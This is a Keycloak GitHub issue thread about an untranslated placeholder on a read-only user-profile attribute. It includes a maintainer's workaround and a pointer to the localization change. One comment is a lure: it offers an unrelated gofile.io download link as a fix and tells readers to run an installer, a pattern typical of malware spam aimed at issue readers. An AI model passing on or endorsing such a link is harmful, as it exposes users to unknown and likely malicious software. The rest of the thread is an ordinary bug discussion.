### ISSUE TITLE
Readonly profile attribute profile has unwanted not translated placeholder

### ISSUE THREAD

**Issue by GioviQ** [keycloak/keycloak#32657]
### Before reporting an issue

- [X] I have read and understood the above terms for submitting issues, and I understand that my issue may be closed without action if I do not follow them.

### Area

account/ui

### Describe the bug

![Immagine 2024-09-04 152457](https://github.com/user-attachments/assets/1fb4699c-9150-4e7e-8dbf-f2acfaf2d043)

The attribute is readonly and in this case the field is empty so the palceholder is not necessary. In any case should be in Italian

### Version

25.0.4

### Regression

- [ ] The issue is a regression

### Expected behavior

For read only attribute no placeholder, if the current user can edit the field the placeholder should be translated like the name of the attrbitue

### Actual behavior

Just see the screenshot

### How to Reproduce?

Go to the profile page of the logged user

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by ssilvert** [comment]
There is a sneaky workaround for this.  Just add the proper annotation to your attribute in user profile and set its value to a blank space.

1. Go to Realm settings --> User profile
2. Edit the attribute
3. Scroll to the bottom and choose the `inputTypePlaceholder` attribute.
4. Set the value to a blank space.

Also, it should be possible to localize the `inputTypePlaceholder` as well.  It looks like the code supports it but I can't get it to work.

I'm going to change this to an enhancement as you have a good point about read only attributes not needing the placeholder at all.  And, at some point we need to make it easy to localize the placeholder string.

**Comment by edewit** [comment]
the translation of the placeholder has been done with #28727
